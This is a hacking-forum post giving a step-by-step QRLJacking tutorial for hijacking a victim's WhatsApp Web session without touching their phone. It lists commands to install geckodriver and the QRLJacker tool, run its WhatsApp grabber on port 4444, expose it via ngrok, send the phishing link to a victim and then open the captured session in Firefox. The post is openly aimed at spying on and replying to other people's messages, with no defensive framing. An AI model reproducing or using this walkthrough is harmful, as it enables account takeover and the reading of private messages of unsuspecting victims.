📲 How Hackers Access WhatsApp Web Session

chushpan

chushpan

Professional
Messages
928
Reaction score
714
Points
93
👉 Newbies often ask: "How to hack WhatsApp without accessing the victim's phone?" Today, I will show how a hacker can access the victim's account without touching the device and without asking for OTP, using only social engineering techniques.

☝️Before we begin, it is important to understand: WhatsApp uses end-to-end encryption, which makes direct interception and reading of messages almost impossible. There are different methods used in different situations, such as MAC spoofing, OTP phishing, SS7 attacks, and others.

📖 In this post, I will talk about a method known as QRLJacking. The hacker sends the victim a malicious link, tricking them into scanning the WhatsApp QR code. This way, the attacker hijacks the WhatsApp Web session and gets the ability to read, spy on, and reply to messages.

1️⃣ Installing Firefox Driver:

👩‍💻 Download the latest version of geckodriver and install it on your Linux system using the commands:
Code: 
Download Latest-geckodriver
tar -xvf <-type-geckodriver-tar-package-name->
chmod +x geckodriver
sudo mv -f geckodriver /usr/local/share/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/local/bin/geckodriver
sudo ln -s /usr/local/share/geckodriver /usr/bin/geckodriver

2️⃣ Installing QRLJacking:

👩‍💻 Download and configure the QRLJacking tool using the commands:
Code: 
git clone https://github.com/OWASP/QRLJacking
cd QRLJacking/QRLJacker
pip install -r requirements.txt
python3 QrlJacker.py

👩‍💻 Now the QRLJacker interface will open in your terminal.

3️⃣ Performing a QRL Jacking attack:

👩‍💻 In the terminal, enter the commands:
Code: 
use grabber/whatsapp
set port 4444
run

🏃‍♂️ I am testing this tool locally. You can use port forwarding for devices outside the local network. I recommend using ngrok for this purpose. In my example, the port is 4444, and the host is 0.0.0.0. Therefore, the link with the QR code in my case is: 0.0.0.0:4444.

4️⃣ Sending the link to the victim:

🔗 Send this link to the victim. Once the victim scans the WhatsApp Web QR code, the hacker will get the saved session, allowing him to access the WhatsApp Web session later.

5️⃣ Accessing the victim's session:

👩‍💻 Press Ctrl + C to terminate QRLJacker and enter the commands:
Code: 
sessions

👩‍💻 Now your terminal will display a list of saved sessions (in my case "0").
sessions -i 0

📌 Wait a few seconds and Firefox will automatically launch with the victim's WhatsApp Web session.
 
You must log in or register to reply here.

Similar threads

Man
Hacking via QR code
Replies
0
Views
158
Man
Man
Cloned Boy
We smoke QR. How to make a QR code with a surprise.
Replies
1
Views
236
noveltyladders
N
chushpan
How to hack an Android smartphone via a .PDF file
Replies
0
Views
265
chushpan
chushpan
chushpan
The evolution of phishing
Replies
0
Views
139
chushpan
chushpan
chushpan
Analyzing the Encoder for VMware ESXi
Replies
0
Views
83
chushpan
chushpan
Back
Top